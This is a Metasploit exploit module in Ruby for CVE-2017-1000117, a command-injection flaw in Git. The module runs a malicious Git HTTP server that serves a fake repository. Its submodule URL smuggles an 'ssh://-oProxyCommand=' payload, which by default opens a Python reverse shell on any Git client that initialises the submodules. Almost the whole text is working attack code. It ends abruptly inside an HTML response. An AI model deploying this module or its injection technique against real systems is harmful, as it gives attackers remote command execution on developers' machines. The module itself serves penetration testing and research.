## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Git def initialize(info = {}) super( update_info( info, 'Name' => 'Malicious Git HTTP Server For CVE-2017-1000117', 'Description' => %q( This module exploits CVE-2017-1000117, which affects Git version 2.7.5 and lower. A submodule of the form 'ssh://' can be passed parameters from the username incorrectly. This can be used to inject commands to the operating system when the submodule is cloned. This module creates a fake git repository which contains a submodule containing the vulnerability. The vulnerability is triggered when the submodules are initialised. ), 'Author' => 'timwr', 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2017-1000117'], ['URL', 'https://seclists.org/oss-sec/2017/q3/280' ] ], 'DisclosureDate' => '2017-08-10', 'Targets' => [ [ 'Automatic', { 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD, 'Payload' => { 'Compat' => { 'PayloadType' => 'python' } } } ] ], 'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_python' }, 'DefaultTarget' => 0 ) ) register_options( [ OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']), OptString.new('GIT_SUBMODULE', [false, 'The path to use as the malicious git submodule (empty for random)', '']) ] ) end def setup @repo_data = { git: { files: {} } } setup_git super end def setup_git # URI must start with a / unless git_uri && git_uri =~ /^\// fail_with(Failure::BadConfig, 'GIT_URI must start with a /') end payload_cmd = payload.encoded + " &" payload_cmd = Rex::Text.to_hex(payload_cmd, '%') submodule_path = datastore['GIT_SUBMODULE'] if submodule_path.blank? submodule_path = Rex::Text.rand_text_alpha(rand(8) + 2).downcase end gitmodules = "[submodule \"#{submodule_path}\"] path = #{submodule_path} url = ssh://-oProxyCommand=#{payload_cmd}/ " blob_obj = GitObject.build_blob_object(gitmodules) @repo_data[:git][:files]["/objects/#{blob_obj.path}"] = blob_obj.compressed tree_entries = [ { mode: '100644', file_name: '.gitmodules', sha1: blob_obj.sha1 }, { mode: '160000', file_name: submodule_path, sha1: blob_obj.sha1 } ] tree_obj = GitObject.build_tree_object(tree_entries) @repo_data[:git][:files]["/objects/#{tree_obj.path}"] = tree_obj.compressed commit_obj = GitObject.build_commit_object(tree_sha1: tree_obj.sha1) @repo_data[:git][:files]["/objects/#{commit_obj.path}"] = commit_obj.compressed @repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n" @repo_data[:git][:files]['/info/refs'] = "#{commit_obj.sha1}\trefs/heads/master\n" end def exploit super end def primer # add the git and mercurial URIs as necessary hardcoded_uripath(git_uri) print_status("Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}") end # handles routing any request to the mock git, mercurial or simple HTML as necessary def on_request_uri(cli, req) # if the URI is one of our repositories and the user-agent is that of git/mercurial # send back the appropriate data, otherwise just show the HTML version user_agent = req.headers['User-Agent'] if user_agent && user_agent =~ /^git\// && req.uri.start_with?(git_uri) do_git(cli, req) return end do_html(cli, req) end # simulates a Git HTTP server def do_git(cli, req) # determine if the requested file is something we know how to serve from our # fake repository and send it if so req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '') if @repo_data[:git][:files].key?(req_file) vprint_status("Sending Git #{req_file}") send_response(cli, @repo_data[:git][:files][req_file]) else vprint_status("Git #{req_file} doesn't exist") send_not_found(cli) end end # simulates an HTTP server with simple HTML content that lists the fake # repositories available for cloning def do_html(cli, _req) resp = create_response resp.body = < Public Repositories

Here are our public repositories: